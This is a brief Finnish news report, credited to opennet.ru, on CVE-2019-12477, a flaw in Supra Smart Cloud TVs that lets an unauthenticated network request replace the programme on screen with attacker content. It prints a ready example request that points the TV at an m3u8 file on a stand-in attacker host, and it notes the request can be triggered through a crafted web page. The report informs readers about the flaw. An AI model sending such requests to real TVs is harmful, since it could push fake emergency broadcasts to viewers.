Supra Smart Cloud -televisioissa haavoittuvuus (CVE-2019-12477), jonka avulla voit korvata katseltavan ohjelman hyökkääjän sisällöllä. Esimerkkinä esitetään kuvitteellisen varoituksen tulos hätätilanteesta.
Hyökkäykseen riittää, että lähetät erityisesti muodostetun verkkopyynnön, joka ei vaadi todennusta. Erityisesti pääset käsittelijään "/remote/media_control?action=setUri&uri=" määrittämällä m3u8-tiedoston URL-osoitteen videoparametreineen, esimerkiksi "http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8."
Useimmissa tapauksissa pääsy television IP-osoitteeseen rajoittuu sisäiseen verkkoon, mutta koska pyyntö lähetetään HTTP:n kautta, on mahdollista käyttää sisäisiä resursseja koskevia menetelmiä, kun käyttäjä avaa erityisesti suunnitellun ulkoisen sivun (esim. kuvapyynnön varjolla tai käyttämällä ).
Lähde: opennet.ru